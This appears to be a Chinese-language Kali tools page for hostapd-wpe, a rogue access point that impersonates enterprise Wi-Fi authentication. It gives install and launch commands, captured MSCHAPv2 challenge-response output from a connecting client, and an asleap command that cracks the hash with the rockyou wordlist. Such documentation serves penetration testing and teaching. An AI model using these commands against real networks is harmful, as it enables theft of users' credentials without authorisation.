hostapd-wpe 介绍

hostapd-wpe FreeRADIUS-WPE的替代者。
它实现了IEEE 802.1 x认证器和认证服务器的模拟攻击来获取客户端凭证,建立连接到客户端,并发动其他攻击。

为模拟hostapd-wpe支持以下EAP类型:
1. EAP-FAST/MSCHAPv2 (Phase 0)
2. PEAP/MSCHAPv2
3. EAP-TTLS/MSCHAPv2
4. EAP-TTLS/MSCHAP
5. EAP-TTLS/CHAP
6. EAP-TTLS/PAP

一旦进行模拟,hostapd-wpe将返回一个EAP-Success消息,以便客户相信他们连接到合法的身份。

802.11客户端,hostapd-wpe还实现了Karma-style无端探测器响应。灵感这是由JoMo-Kun提供的补丁hostapd的旧版本。

作者:Thomas d’Otreppe
证书:BSD license

工具来源
工具主页
Kali hostapd-wpe Repo 仓库
Kali hostapd-wpe 工具包

hostapd-wpe——修改hostapd,促进AP的模拟攻击

更新你的kali安装,安装hostapd-wpe如果不存在。

root@kali:~# apt update
root@kali:~# apt install hostapd-wpe

一旦安装,配置AP属性通过编辑/etc/hostapd-wpe/hostapd-wpe.conf

root@kali:~# nano /etc/hostapd-wpe/hostapd-wpe.conf

关闭network-manager 进程,使用 airmon-ng

root@kali:~# airmon-ng check kill

开始hostapd-wpe。将出现一个无线AP。密码的用户连接和验证这个网络将打印到控制台。

root@kali:~# hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
Configuration file: /etc/hostapd-wpe/hostapd-wpe.conf
Using interface wlan0 with hwaddr c4:e9:84:17:ff:c8 and ssid "hostapd-wpe"
wlan0: interface state UNINITIALIZED>ENABLED
wlan0: AP-ENABLED
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: authenticated
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: associated (aid 1)
wlan0: CTRL-EVENT-EAP-STARTED ac:fd:ec:78:72:bd
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25

mschapv2: Sat Nov 12 16:04:03 2016
username: me
challenge: 8e:0e:9d:0b:5a:3f:f5:23
response: 34:f8:42:4d:16:c7:2d:69:cc:38:10:d4:cf:71:f7:83:37:68:d8:8a:e9:86:f2:67
jtr NETNTLM: me:$NETNTLM$8e0e9d0b5a3ff523$34f8424d16c72d69cc3810d4cf71f7833768d88ae986f267

wlan0: CTRL-EVENT-EAP-FAILURE ac:fd:ec:78:72:bd
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.1X: authentication failed - EAP type: 0 (unknown)
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.1X: Supplicant used different EAP type: 25 (PEAP)
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: disassociated
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: deauthenticated due to local deauth request
wlan0: AP-DISABLED
nl80211: deinit ifname=wlan0 disabled_11b_rates=0

一旦得到挑战式握手的反应,使用asleap破解它们,连同密码字典文件。

root@kali:~# zcat /usr/share/wordlists/rockyou.txt.gz | asleap -C 8e:0e:9d:0b:5a:3f:f5:23 -R 34:f8:42:4d:16:c7:2d:69:cc:38:10:d4:cf:71:f7:83:37:68:d8:8a:e9:86:f2:67 -W -

asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using STDIN for words.
hash bytes: 586c
NT hash: 8846f7eaee8fb117ad06bdd830b7586c
password: password